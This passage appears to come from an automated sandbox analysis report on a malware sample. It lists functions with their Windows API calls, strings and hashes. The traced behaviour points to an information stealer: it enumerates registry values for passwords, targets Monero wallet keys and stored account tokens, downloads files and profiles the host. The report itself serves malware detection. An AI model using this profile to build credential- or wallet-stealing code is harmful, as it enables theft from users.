                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 519564d3e321d12d54fd4f0998ed70695587170dc4e91361be1b02f0a43fbdf2
                              • Instruction ID: af4f5705d73433acc15fd457a23077cc32ec36c838f4e97ec22d2e3fbfba719a
                              • Opcode Fuzzy Hash: 519564d3e321d12d54fd4f0998ed70695587170dc4e91361be1b02f0a43fbdf2
                              • Instruction Fuzzy Hash: EC314CB2901509EFCB09EBB8DC95DFE777CBB54302F144118F106AB291DB34A946CB52
                              Function 001C8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00EEDCA8,00000000,?,001D0E2C,00000000,?,00000000), ref: 001C8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001C8158
                              • __aulldiv.LIBCMT ref: 001C8172
                              • __aulldiv.LIBCMT ref: 001C8180
                              • wsprintfA.USER32 ref: 001C81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: e226ab64b30691003ec3b714a1a9853e1eb8577be634c41de5997c316c24abf0
                              • Instruction ID: 7c289a3e6b03bbb279d36ecce83e1cc56f0e6a5878e7e51d80e415580d811be1
                              • Opcode Fuzzy Hash: e226ab64b30691003ec3b714a1a9853e1eb8577be634c41de5997c316c24abf0
                              • Instruction Fuzzy Hash: 65214DB1E44208ABDB00DFD4DC49FAEB7B8FB54B10F104219F605BB280D778A9018BA5
                              Function 001B60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                              • InternetOpenA.WININET(001D0DF7,00000001,00000000,00000000,00000000), ref: 001B610F
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001B618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001B61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001B61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001B620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 001B6249
                              • InternetCloseHandle.WININET(?), ref: 001B6253
                              • InternetCloseHandle.WININET(00000000), ref: 001B6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 40ec34561c92e20a66a564ac16f8fa584fa0c4e5a3749a649d09f90bca28b9b4
                              • Instruction ID: b61ed7d8c2bd8058db42dd87bef943314d86c69edc4476fbb3610d1f8f288118
                              • Opcode Fuzzy Hash: 40ec34561c92e20a66a564ac16f8fa584fa0c4e5a3749a649d09f90bca28b9b4
                              • Instruction Fuzzy Hash: 3D515DB1900218ABEB20DF90DC45FEE77B8EB54705F108098E609A7181DB78AA89CF95
                              Function 001B72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001B733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001B73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001B740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001B7452
                              • HeapFree.KERNEL32(00000000), ref: 001B7459
                              • task.LIBCPMTD ref: 001B7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 309818f0c0db06d5db9b5a4a4c1d05736b5a9a57d8244c35cef840ad3c2ee11e
                              • Instruction ID: 98becd3532a745a116274634cfe27636206a989ec54e89d8b5d1684a6ea9095a
                              • Opcode Fuzzy Hash: 309818f0c0db06d5db9b5a4a4c1d05736b5a9a57d8244c35cef840ad3c2ee11e
                              • Instruction Fuzzy Hash: 03611BB59041589BDB24DF50CC45BE9B7BCBF58340F0081E9E649A6281DBB06BC9CFA1
                              Function 001BBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              • lstrlen.KERNEL32(00000000), ref: 001BBC9F
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 001BBCCD
                              • lstrlen.KERNEL32(00000000), ref: 001BBDA5
                              • lstrlen.KERNEL32(00000000), ref: 001BBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 0abb7b0ec0cfe1f6edb0658a61131871c7944ad78ab2a1a8e0280bca8f782891
                              • Instruction ID: a33502cfc2699c4fa348f3c3fb81ebbe44c42d166cdb8c582492d42e78b4d6d3
                              • Opcode Fuzzy Hash: 0abb7b0ec0cfe1f6edb0658a61131871c7944ad78ab2a1a8e0280bca8f782891
                              • Instruction Fuzzy Hash: 5AB11171910108ABDB15FBA0DD96FEE733CAF74309F80415DF506A6191EF34AA49CBA2
                              Function 001C6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 52e6c4bfd3613e51eb0dcc4fc8ca441011baf98fce3d250b771b5e705f6710fc
                              • Instruction ID: 935c4a1839a20738aaf154d1b24657a5a1e57db135b761129ceb5bee7ee42ecb
                              • Opcode Fuzzy Hash: 52e6c4bfd3613e51eb0dcc4fc8ca441011baf98fce3d250b771b5e705f6710fc
                              • Instruction Fuzzy Hash: 81F05E71904209EFD345AFE0E909F3C7B78FB05703F140198E61D86290D6709B41DBD6
                              Function 001B4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001B4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B4FD1
                              • InternetOpenA.WININET(001D0DDF,00000000,00000000,00000000,00000000), ref: 001B4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 001B5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 001B5041
                              • InternetCloseHandle.WININET(?), ref: 001B50B9
                              • InternetCloseHandle.WININET(?), ref: 001B50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8a43f43c59ed5616a03a623de5107c450fb85e86fc01257cf246deb9a42ebced
                              • Instruction ID: 4b06f816c6dcab4ce3ab38d9f84e7bf407155a6556fd6b25c24e4260b538ad97
                              • Opcode Fuzzy Hash: 8a43f43c59ed5616a03a623de5107c450fb85e86fc01257cf246deb9a42ebced
                              • Instruction Fuzzy Hash: 333108F4A00218ABDB20DF94DC85BDCB7B9EB48704F5081D9F609A7280D7706AC5CF99
                              Function 001C83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001C8426
                              • wsprintfA.USER32 ref: 001C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C8499
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00EEDB28,00000000,000F003F,?,00000400), ref: 001C84EC
                              • lstrlen.KERNEL32(?), ref: 001C8501
                              • RegQueryValueExA.ADVAPI32(00000000,00EEDD20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001D0B34), ref: 001C8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 943ff8b94d1dbe444602662a3711e1b6181c993030d9acf52ece038364526d3c
                              • Instruction ID: acc446010675e6697ed19a8536121e02ae46d76bae510cf9e214c28a385863bd
                              • Opcode Fuzzy Hash: 943ff8b94d1dbe444602662a3711e1b6181c993030d9acf52ece038364526d3c
                              • Instruction Fuzzy Hash: A521C9B195022CABDB24DB54DC85FE9B7B8FB48704F00C5D9E609A6240DF71AA85CFD4
                              Function 001C7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00EDB9F8,00000000,00020119,00000000), ref: 001C76DD
                              • RegQueryValueExA.ADVAPI32(00000000,00EEDC18,00000000,00000000,?,000000FF), ref: 001C76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 4c64fd4946dcd9edc2197e7897b5c47813c740e20ee2048317d3936e350741a7
                              • Instruction ID: 949219cf257a5d413ab94de94ad67e909ad09266a017515c7da6a536f0577bcd
                              • Opcode Fuzzy Hash: 4c64fd4946dcd9edc2197e7897b5c47813c740e20ee2048317d3936e350741a7
                              • Instruction Fuzzy Hash: A0011AB5A04708ABE701EBE4DD49F79B7BCEB48701F104059FA0896290D7B0A904CB51
                              Function 001C7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00EDB9F8,00000000,00020119,001C76B9), ref: 001C775B
                              • RegQueryValueExA.ADVAPI32(001C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001C777A
                              • RegCloseKey.ADVAPI32(001C76B9), ref: 001C7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 35ea929b35d41f9af50a55180a232db7e2128a93126e5869c3b5b58ab09ea134
                              • Instruction ID: 030b91247b12bb50d92729a17e11f1f004ff050033334fd1bdd517a1411f0bf9
                              • Opcode Fuzzy Hash: 35ea929b35d41f9af50a55180a232db7e2128a93126e5869c3b5b58ab09ea134
                              • Instruction Fuzzy Hash: 7C01DEF5A40208BBD701DBE4DC49FBEB7BCEB48705F104559FA09A7281D6B0A544CB51
                              Function 001B99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                              • LocalFree.KERNEL32(001B148F), ref: 001B9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
